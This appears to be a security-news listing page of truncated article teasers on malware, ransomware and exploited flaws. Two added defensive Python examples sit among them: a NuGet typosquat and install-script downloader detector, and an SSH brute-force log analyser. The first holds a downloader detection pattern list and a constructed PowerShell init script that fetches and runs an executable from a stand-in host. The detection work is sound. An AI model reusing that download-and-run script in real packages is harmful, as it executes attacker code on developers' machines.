Cryptocurrency Stealer Malware Found in 13 Malicious NuGet Packages
Security researchers have detailed a cryptocurrency-stealer malware delivered through 13 malicious NuGet packages. The supply chain attack targeted .NET developers and relied on a typosquatting campaign: the packages impersonated legitimate ones and, on installation, ran PowerShell code that fetched a second-stage binary from a hard-coded server. The two-stage attack led to the deployment of a
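The two techniques in the summary above (typosquatted package IDs, and an install-time PowerShell downloader) are both things a registry or CI gate can check for. The following is an added example written for this page, not code from the researchers or from NuGet: the list of "popular" package IDs, the candidate names and the install script are constructed for illustration, and the assumption that the downloader lives in a `tools/init.ps1` hook is mine.

```python
import re

# Constructed list of well-known package IDs; in practice this would be the top-N
# download list from the registry.
POPULAR = ["Newtonsoft.Json", "Serilog", "Coinbase", "Microsoft.Extensions.Logging"]

# Cmdlets/aliases commonly used to pull a second stage; constructed list, extend as needed.
DOWNLOADER_PATTERNS = re.compile(
    r"(Invoke-WebRequest|Invoke-RestMethod|DownloadFile|DownloadString|"
    r"Start-BitsTransfer|\biwr\b|\bwget\b|\bcurl\b)",
    re.IGNORECASE,
)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, case-insensitive because NuGet IDs are case-insensitive."""
    a, b = a.lower(), b.lower()
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name: str, popular=POPULAR, max_distance: int = 2):
    """Popular IDs within `max_distance` edits of `name`, nearest first.

    Exact matches are excluded: they are the legitimate package itself.
    """
    hits = [(p, d) for p in popular if 0 < (d := edit_distance(name, p)) <= max_distance]
    return sorted(hits, key=lambda t: t[1])


def downloader_cmdlets(script: str) -> list[str]:
    """Distinct downloader cmdlets/aliases found in an install script (tools/init.ps1)."""
    return sorted({m.group(1).lower() for m in DOWNLOADER_PATTERNS.finditer(script)})


def assess_package(package_id: str, init_script: str = "") -> dict:
    """Combine both signals for one package; a hit on both is the pattern described above."""
    squats = typosquat_candidates(package_id)
    downloaders = downloader_cmdlets(init_script)
    return {
        "id": package_id,
        "impersonates": [p for p, _ in squats],
        "downloaders": downloaders,
        "suspicious": bool(squats) and bool(downloaders),
    }


# Constructed init.ps1 fragment of the kind the summary describes (hypothetical host).
SAMPLE_INIT_PS1 = r"""
param($installPath, $toolsPath, $package, $project)
$u = "https://update.example.invalid/x.exe"   # hypothetical second-stage host
(New-Object Net.WebClient).DownloadFile($u, "$env:TEMP\x.exe")
Start-Process "$env:TEMP\x.exe"
"""

if __name__ == "__main__":
    print(assess_package("Coinbasse", SAMPLE_INIT_PS1))
```

`edit_distance` is deliberately the plain O(n·m) algorithm; for a real registry feed you would prefilter by prefix or length before comparing against the popular list.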
- Published in News
Taiwanese PC Manufacturer MSI Hit by Ransomware Attack
MSI, the Taiwanese PC company, has officially confirmed that it was the victim of a cyber attack on its systems. The company promptly initiated incident response and recovery measures after detecting network anomalies and alerted law enforcement agencies. However, MSI did not disclose any specifics about the attack or whether any proprietary information, including source
- Published in News
Arid Viper Hacking Group Utilizes Enhanced Rorschach Ransomware in Middle East Cyber Attacks
Cybersecurity researchers have detailed a previously unknown and highly sophisticated ransomware strain, Rorschach, which is both technically advanced and unusually fast. According to a report by Check Point Research, Rorschach stands out from other strains through its high degree of customization and technical features not previously seen in ransomware. In fact, Rorschach is considered one of the
- Published in News
WordPress Elementor Pro Vulnerability Exploited by Hackers
A recently patched security vulnerability in the WordPress Elementor Pro website builder plugin is being actively exploited by unidentified attackers. The broken access control flaw affects versions 3.11.6 and earlier and was fixed by the plugin developers in version 3.11.7, released on March 22. In the release notes, the Tel Aviv-based company mentioned, “Improved code security enforcement
- Published in News
North Korean APT43 Cyber Group Targets Strategic Intelligence and Financial Gains
A newly identified North Korean cyber group, APT43, has been linked to multiple campaigns aimed at gathering strategic intelligence in line with Pyongyang’s geopolitical interests since 2018. Tracked by Google-owned Mandiant, APT43’s objectives include both espionage and financial motives, employing methods such as credential harvesting and social engineering to achieve its goals. APT43 attempts to generate
- Published in News
Microsoft Shares Guidance on Detecting Outlook Vulnerability Exploited by Russian Hackers
On Friday, Microsoft published guidance to help users identify indicators of compromise (IoCs) linked to a recently patched Outlook vulnerability. Tracked as CVE-2023-23397 (CVSS score: 9.8), the critical flaw is a privilege escalation issue that can be abused to leak NT LAN Manager (NTLM) hashes and mount a relay attack without any user interaction. According to Microsoft’s advisory,
- Published in News
Linux SSH Servers Targeted in ShellBot Malware Campaign
A new campaign targeting poorly managed Linux SSH servers has been identified, deploying several variants of the ShellBot malware. The AhnLab Security Emergency Response Center (ASEC) reported that ShellBot, also known as PerlBot, is a DDoS bot written in Perl that typically uses the IRC protocol to communicate with its C&C server. According to
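"Poorly managed" here means servers with password authentication and guessable credentials, so the initial access looks like a burst of failed logins from one source followed by a success. The following is an added example, not ASEC's detection or part of the report: it runs that heuristic over a constructed set of sshd log lines (addresses from the documentation ranges, hostnames invented).

```python
import re
from collections import defaultdict

# Matches the standard OpenSSH auth log line for both failed and successful logins.
SSH_RE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) (password|publickey|keyboard-interactive/pam|none) "
    r"for (?:invalid user )?(\S+) from (\S+) port (\d+)"
)

# Constructed log excerpt: a password spray that eventually succeeds, plus normal key-based logins.
SAMPLE_LOG = [
    "Mar 20 10:01:02 srv sshd[1201]: Failed password for root from 198.51.100.7 port 51000 ssh2",
    "Mar 20 10:01:03 srv sshd[1202]: Failed password for root from 198.51.100.7 port 51001 ssh2",
    "Mar 20 10:01:03 srv sshd[1203]: Failed password for invalid user admin from 198.51.100.7 port 51002 ssh2",
    "Mar 20 10:01:04 srv sshd[1204]: Failed password for invalid user oracle from 198.51.100.7 port 51003 ssh2",
    "Mar 20 10:01:05 srv sshd[1205]: Failed password for root from 198.51.100.7 port 51004 ssh2",
    "Mar 20 10:01:06 srv sshd[1206]: Failed password for root from 198.51.100.7 port 51005 ssh2",
    "Mar 20 10:01:09 srv sshd[1210]: Accepted password for root from 198.51.100.7 port 51020 ssh2",
    "Mar 20 10:02:00 srv sshd[1300]: Accepted publickey for alice from 10.0.0.8 port 40000 ssh2",
    "Mar 20 10:02:30 srv sshd[1301]: Failed password for bob from 10.0.0.9 port 40010 ssh2",
    "Mar 20 10:02:35 srv sshd[1302]: Accepted password for bob from 10.0.0.9 port 40011 ssh2",
]


def find_brute_force(lines, threshold: int = 5) -> dict:
    """Per source IP with >= threshold failures: the count, the usernames tried, and any
    logins accepted *after* the threshold was crossed (user, auth method)."""
    stats = defaultdict(lambda: {"failed": 0, "users": set(), "accepted": []})
    for line in lines:
        m = SSH_RE.search(line)
        if not m:
            continue
        outcome, method, user, ip, _port = m.groups()
        rec = stats[ip]
        if outcome == "Failed":
            rec["failed"] += 1
            rec["users"].add(user)
        elif rec["failed"] >= threshold:
            rec["accepted"].append((user, method))
    return {
        ip: {"failed": r["failed"], "users": sorted(r["users"]), "accepted": r["accepted"]}
        for ip, r in stats.items()
        if r["failed"] >= threshold
    }


def compromised_sources(lines, threshold: int = 5) -> list[str]:
    """Source IPs that brute-forced their way in: threshold failures then a success."""
    return sorted(ip for ip, r in find_brute_force(lines, threshold).items() if r["accepted"])


if __name__ == "__main__":
    for ip, r in find_brute_force(SAMPLE_LOG).items():
        print(ip, r)
```

The threshold is per source over the whole input; for a real pipeline you would window it in time and also collapse the distributed case, where many sources each stay under the threshold against one account.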
- Published in News
Suspected Chinese Hackers Exploited a Fortinet Zero-Day for Espionage
Mandiant, the threat intelligence firm, has attributed the zero-day exploitation of a medium-severity security flaw in Fortinet's FortiOS operating system to a suspected Chinese hacking group. The activity is part of a broader campaign to deploy backdoors onto Fortinet and VMware appliances and maintain persistent access to victim environments. Mandiant is tracking the malicious
- Published in News
A 3-year-old vulnerability has been exploited by multiple hacker groups to breach U.S. government agencies
Recently, a critical security flaw in Progress Telerik was exploited by multiple threat actors, including a nation-state group, to gain unauthorized access to an unnamed federal entity in the U.S. The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) jointly issued an advisory, revealing
- Published in News
Fake ChatGPT Chrome extensions hijack Facebook accounts to display malicious ads
A malicious Chrome browser extension posing as ChatGPT has been found hijacking Facebook accounts and creating rogue admin accounts, one of several methods cybercriminals are using to distribute malware. Guardio Labs researcher Nati Tal warns that by hijacking high-profile Facebook business accounts, the threat actor creates an army of Facebook
- Published in News